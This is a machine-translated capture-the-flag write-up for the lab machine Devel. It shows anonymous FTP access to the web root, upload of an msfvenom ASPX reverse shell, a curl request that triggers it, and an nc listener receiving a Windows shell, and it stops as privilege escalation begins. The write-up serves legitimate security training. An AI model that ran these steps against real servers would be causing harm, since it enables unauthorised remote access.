This post was originally written in Spanish and translated into English using a large language model (LLM). Although the translation has been reviewed, it may contain inaccuracies or inconsistencies.
Description
In this post, we complete the Devel write-up. We connect to FTP with anonymous:anonymous, create an ASPX reverse shell using Msfvenom and escalate privileges through CVE-2011-1249, also known as MS11-046.
We can access FTP with anonymous:anonymous, and the web server is running Microsoft IIS 7.5; see HackTricks.
FTP
Logging into FTP with anonymous:anonymous appears to place us in the directory containing the web server’s content.
1 2 3 4 5 6 7 8 9 10 11 12 13 14
❯ ftp 10.10.10.5 Connected to 10.10.10.5. 220 Microsoft FTP Service Name (10.10.10.5:void4m0n): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 229 Entering Extended Passive Mode (|||49169|) 125 Data connection already open; Transfer starting. 03-18-17 02:06AM <DIR> aspnet_client 03-17-17 05:37PM 689 iisstart.htm 03-17-17 05:37PM 184946 welcome.png
We have write permissions, so we can try uploading a reverse shell.
Exploitation
Initial Access
Creating the Reverse Shell
We use msfvenom to create a reverse shell in the executable aspx format used by Microsoft IIS.
ftp> put revshell.aspx local: revshell.aspx remote: revshell.aspx 229 Entering Extended Passive Mode (|||49178|) 125 Data connection already open; Transfer starting. 100% |****************************| 2739 28.39 MiB/s --:-- ETA 226 Transfer complete. 2739 bytes sent in 00:00 (18.83 KiB/s)
Receiving the Connection
1 - Listen on the selected port, using rlwrap for a more interactive shell.
1 2
rlwrap nc -lvnp 1234 listening on [any] 1234 ...
2 - Send a GET request to revshell.aspx.
1
curl -s -X GET "http://10.10.10.5/revshell.aspx"
3 - Receive the connection.
1 2 3 4 5 6 7
❯ rlwrap nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.16.2] from (UNKNOWN) [10.10.10.5] 49181 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>
Privilege Escalation
Once we have a shell, we run systeminfo to identify the exact Windows version.